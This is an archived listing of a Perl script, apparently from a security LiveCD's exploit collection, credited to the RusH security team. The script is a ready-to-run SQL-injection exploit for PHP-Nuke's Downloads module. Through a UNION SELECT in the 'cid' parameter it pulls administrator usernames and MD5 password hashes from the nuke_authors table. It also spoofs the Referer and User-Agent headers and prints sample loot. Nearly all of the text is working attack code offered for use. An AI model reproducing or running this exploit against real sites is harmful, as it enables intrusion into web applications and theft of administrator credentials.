home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpnuke / 2003.12.21.r57phpnuke.pl < prev    next >
Perl Script  |  2005-02-12  |  3KB  |  97 lines

  1. #!/usr/bin/perl -w
  2. use IO::Socket;
  3.  
  4. ########################################
  5. ## THIS CODE PUBLIC NOW  =)))        ##
  6. ########################################
  7. ## __________               ___ ___   ##
  8. ## \______   \__ __  ______/   |   \  ##
  9. ##  |       _/  |  \/  ___/    _    \ ##
  10. ##  |    |   \  |  /\___ \\         / ##
  11. ##  |____|_  /____//____  >\___|_  /  ##
  12. ##         \/           \/       \/   ##
  13. ########################################
  14. ## based on 'cid' sql injection vuln
  15. ## in Download module, more info about
  16. ## this vuln u can see here:
  17. ## http://rst.void.ru/texts/advisory10.htm
  18. ########################################
  19. ## work only on mysql version > 4.0
  20. ########################################
  21. ## tested on PHP-Nuke versions: 6.9, 6.0, 6.5
  22. ## C:\>r57phpnuke.pl 127.0.0.1 /phpnuke/ admin
  23. ##
  24. ## server : 127.0.0.1
  25. ## folder : /phpnuke/
  26. ## aid    : admin
  27. ##
  28. ## [~] prepare to connect...
  29. ## [+] connected
  30. ## [~] prepare to send data...
  31. ## [+] success
  32. ## [~] wait for reply...
  33. ## [+] w00t...
  34. ## [+] USER: admin
  35. ## [+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99
  36. ##
  37. ########################################
  38.  
  39. if (@ARGV < 3)
  40. {
  41. print "#############################################################\n";
  42. print " r57nuke-cid.pl - PHP-NUKE 'cid' sql injection exploit\n";
  43. print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
  44. print " coded by 1dt.w0lf // r00t\@rsteam.ru // 17.09.2003\n";
  45. print "#############################################################\n";
  46. print " Usage:\n";
  47. print " r57nuke-cid.pl <host> </folder/> <aid>\n";
  48. print "\n";
  49. print " <host> - host for attack\n";
  50. print " </folder/> - PHP-nuke folder ( /phpnuke/ , /nuke/ or / for no folder )\n";
  51. print " <aid> - user aid , nick ( admin , blabla )\n";
  52. print "#############################################################";
  53. exit();
  54. }
  55.  
  56. $server = $ARGV[0];
  57. $folder = $ARGV[1];
  58. $aid = $ARGV[2];
  59.  
  60. print "\n";
  61. print "server : $server\n";
  62. print "folder : $folder\n";
  63. print "aid    : $aid\n";
  64. print "\n";
  65. $success = 0;
  66. $path_download = "modules.php?name=Downloads&d_op=viewdownload&cid=2%20
  67. UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--";
  68. $GET = $folder . $path_download;
  69. print "[~] prepare to connect...\n";
  70. $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || 
  71. die "[-] connect failed\n";
  72. print "[+] connected\n";
  73. print "[~] prepare to send data...\n";
  74. print $socket "GET $GET HTTP/1.1\n";
  75. print $socket "Host: $server\n";
  76. print $socket "Accept: */*\n";
  77. print $socket "Http-Referer: http://microsoft.com\n";
  78. print $socket "User-Agent: Internet Explorer 6.0\n";
  79. print $socket "Pragma: no-cache\n";
  80. print $socket "Cache-Control: no-cache\n";
  81. print $socket "Connection: close\n\n";
  82. print "[+] success\n";
  83. print "[~] wait for reply...\n";
  84. while ($answer = <$socket>)
  85. {
  86.  #print "$answer";
  87.  if ($answer=~/(&cid=)(\w)(\"><b>)($aid)(<\/b><\/a><\/font>)(.{0,20})
  88. (<font class=\"content\">)(.{32})(<\/font>)/)
  89.  {
  90.  $success = 1;
  91.  print "[+] w00t...\n";
  92.  print "[+] USER: $1 \n[+] MD5 HASH: $6\n";
  93.  }
  94. }
  95. if ($success == 0) { print "[-] exploit failed =(\n"; }
  96.  
  97.